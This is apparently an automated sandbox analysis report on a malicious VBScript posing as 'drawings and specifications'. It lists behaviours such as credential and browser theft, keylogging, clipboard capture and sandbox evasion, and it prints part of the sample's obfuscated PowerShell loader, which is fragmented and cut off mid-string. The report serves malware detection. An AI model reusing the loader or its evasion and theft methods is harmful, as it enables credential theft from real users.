Edit tour
Windows
Analysis Report
Drawings_and_specifications.vbs
Overview
General Information
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Very long command line found
May check the online IP address of the machine
Obfuscated command line found
Uses ipconfig to lookup or modify the Windows network settings
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64native
- wscript.exe (PID: 7124 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Drawi ngs_and_sp ecificatio ns.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1) - ipconfig.exe (PID: 6164 cmdline:
ipconfig / flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8) - conhost.exe (PID: 4452 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 1820 cmdline:
cmd /k ech o hell MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1696 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - powershell.exe (PID: 3588 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Boykott = """GeFAlu CnUbcLut Si GoAnn C TeK Do En ThsRat M0 r2Ef S{Sa Se Ch i Pa p SaSarUna Vem S(Sk[J oS AtPar S ivinEkg o] ab`$SePRea StaFotKrrK ryUpkAmnSp iFonIm2 K0 Th1 A)fl;F i M`$ aFha o GnRee Bt ByiFlk S1T r3Sa4Sc Se =Ka C'bo'K r; T BoW T r RiAstOve b-MoHBaoB rs dt C N` $raFGloSon Te St Si FkLe1Ea3 P 4 N;Do LyW SrKai Ft ReKn-InHGr o TssttKr Ou`$LaF Io BenExeCyt Ci Nkur1En 3Ec4Ra; S DiWSrrAnir at me P-Ad HTeo OsYat J K`$LdFF loOpn Fe C t ZiNikCh1 Sv3Te4st; D A Ha M i s`$AaBHad ze BlEn2Un 2Su2 E Po= Pa FiNDreR iw c-BuOEn bVrj Ie Bc Sct U EtbT eypat PeRe [en]di Sq( a`$foPUna Swa Ot Vr UyTik Nn H i DnNu2 T0 Ou1Ol.RaL Ee unOvgha t Rh D A/V i af2 S)Ta ;co La In K uFShoAfr A( C`$SiS StpTraIngU d=To0Ad; K I`$UlS Pp UaTrgJa W - SlUnt B Th`$ UPSua TaIct BrU pyAak Snst iStnCr2 N0 No1Ro.SeLs ceBrnBeg R tUnhRe;al T`$ cS UpT iapagSe+Br =To2Ol) D{ ko T Ca Lo qu L Ma S S`$ TB Ad Glesklfl2D r2Br2 C[ C `$FoSPupfo aargHo/ O2 B] v Ra=M e R[ Eczuo PunThvUde ErAltFo]Sj :St: BT Po KoB Hy Mt Fe S(Su`$N oPKiaFiaRo tInr RySnk DrnPri SnF o2Sk0 K1 S .SySBeuPab Bs HtUpr Ii UnAkgAd (De`$BrSSu p UaRigIn, Ra T2El) o , C Tr1 I6 L) N;Pa S Ho`$ FBMa dEneStlAp2 p2 a2Co[V e`$RtS Hp Ua GgBo/ S 2Gi]Sp Dr= bl M(po`$U dBdad We C l q2 N2Ec2 Sk[Du`$ SS Tp da Eg S/Hj2 H] S B- Sb Bx FoNorUn T1 Ci5De5An)E k;He Ma G Ba Op}du B [ToSHotPer Bli TnPogR e]Do[ExS S y bs St Re EumCo. PT VeTaxTotSa . CESlnCic BooKedAni SnStg S] F : I: SA PS smCFrISaIS t. TG Cean tCeSEltAdr MiiMun KgU n(Ch`$ tBO mddie Ol G 2 A2Tr2 E) E;ch}sc`$ seD SeSkmH eoPog C0Ar =GuK WoTvn Ths Ht M0F o2 S Mo'Gr C F8PoEEu2 OERa8SoE OFWbFQuEFr FSh6 CBHa5 MF mF JFW e7TuF H7Mi 'ud; H`$ A D KeRamIno Xeg S1Re=S hKDioMonFh s Mt M0 K2 M Ju' SDT a6 RFAf2Al F C8MeEHa9 RFCo4 IEB l8 SF U4 A F SDpeEEpF SBLd5 LC FCFoFDe2Ho FEl5TaAKl8 EmAHi9paBG i5StC TE F FHy5 RE b8 ArFUdA SFM uDRdFsuE L D R5smF hA CEDkF FFF l2 PE BDIn FNoEFeDPi6 UFCeEIdE SFKoF O3Es F a4SqFWaF BlE P8le'R o;be`$AfDH leScmDeoMo g M2 c=SoK Ino NnBrs BtSi0af2Om Op' VDRaC PrFElE HE OFCaCSeB J E A9KrF I4 MaFFo8 LDS lA KFWaFPi F mFSyESt9 NoFKoECoEV a8 VEEw8 V 'Di;Ra`$ P D UeGumAko Sg L3 I= SK ao en R s KtRi0La2 Un K' SCBo 8 CEFe2EmE Gu8FiEShFB uFRaE PF M 6 SBTu5 HC Sl9AaETjE AFPo5 GECy FinF C2MiF o6FrF MEa iB D5GrD T 2 QF N5 CE HyF BFSaE BEOv9 CFDi 4HjECiBbrC Se8 BF ME VEFe9ciERi D FF S2PaF D8 SFKaES lE D8laB s 5SvD S3 OF KoASuFIn5S tFViFJaFRe 7ReFSpESyC Sk9 BF JE TF eDSo'Pa ;Ov`$HyDPe eMomChoIng Ko4So= pKF uoPan Fs P tLa0Pr2Af Ja'BuE o8 RE SFFlECh 9ChFBr2TaF P5LaFNyC P'In;Sy`$P hD seBemPh oPag r5Kr= oKPooRen Ts Stbi0Ul 2Po D' RD GC TFSyESk EAuFCoDra6 TF P4 PFS